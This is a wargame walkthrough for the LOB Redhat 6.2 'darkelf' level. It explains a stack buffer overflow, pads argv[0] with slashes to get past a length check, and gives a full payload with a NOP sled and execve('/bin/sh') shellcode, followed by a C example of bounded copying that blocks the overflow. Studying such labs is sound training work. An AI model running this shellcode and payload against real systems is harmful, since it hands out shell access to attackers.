LOB Redhat 6.2 - darkelf

5unKn0wn 2015. 10. 24. 00:54


darkelf - the target binary checks argv[0] (only its length)

Stack (low to high) : i[4] + buffer[40] + sfp[4] + ret[4], so 44 bytes of filler reach the return address

./orge == ./////////////orge : both paths run the same program, so argv[0] can be padded with slashes to the length the check expects

return address : 0xbffffc33 - 71 = 0xbffffbac

Payload : .`python -c 'print "/"*72 + "orge"'` `python -c 'print "A"*44 + "\xac\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

argv[0] : "." + 72 slashes + "orge", the padded program path
argv[1] : 44 bytes of filler (buffer + sfp) followed by the return address 0xbffffbac (little-endian)
argv[2] : 100-byte NOP sled followed by execve("/bin/sh") shellcode

The return address points into argv[2] (the NOP sled and shellcode).
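The note above shows why the argv[0] length check is no defence: the caller chooses argv[0], and the overflow itself comes from an unbounded copy of argv[1] into the 40-byte buffer. As an added example (not the wargame's own source), the C below assumes the layout the note describes, an int and a 40-byte buffer on the stack filled from argv[1], and shows the bounded copy that rejects an overlong argument instead of letting it run over sfp and the return address. The names bounded_copy, handle_args and try_copy are this example's own.

```c
/* Added example, not the LOB binary's source. Assumes the stack layout from
 * the note: int i, char buffer[40], then sfp and the saved return address. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40

/* Copy src into dst only if it fits with its terminator.
 * Returns 0 on success, -1 if src is too long (no silent truncation). */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = 0;
    while (n < dst_size && src[n] != '\0') {
        n++;
    }
    if (n == dst_size) {
        return -1;           /* src has no room for the NUL: reject it */
    }
    memcpy(dst, src, n + 1); /* n bytes plus the terminator */
    return 0;
}

/* The program name in argv[0] is attacker-controlled (exec, or a path padded
 * with slashes), so decisions are based on the data actually copied, never on
 * strlen(argv[0]). Returns 0 on success, 1 for missing argument, 2 if argv[1]
 * would not fit in the buffer. */
int handle_args(int argc, char *argv[]) {
    char buffer[BUF_SIZE];
    int i;
    if (argc < 2) {
        return 1;
    }
    if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
        return 2;
    }
    for (i = 0; buffer[i] != '\0'; i++) {
        /* buffer is used here; it is always NUL-terminated at this point */
    }
    return 0;
}

/* Helper for the check below: build a constructed argument of src_len 'A'
 * bytes and return what bounded_copy says about it. -2 means the helper's
 * own scratch space is too small for the request. */
int try_copy(size_t src_len) {
    char src[128];
    char dst[BUF_SIZE];
    if (src_len >= sizeof src) {
        return -2;
    }
    memset(src, 'A', src_len);
    src[src_len] = '\0';
    return bounded_copy(dst, sizeof dst, src);
}

int main(int argc, char *argv[]) {
    int rc = handle_args(argc, argv);
    if (rc == 2) {
        fprintf(stderr, "argument is too long\n");
    }
    return rc;
}
```

A 39-byte argument is the longest that fits; 40 bytes or more (including the 44 bytes of filler the payload uses) is refused before anything is written, so the saved frame pointer and return address are never reached.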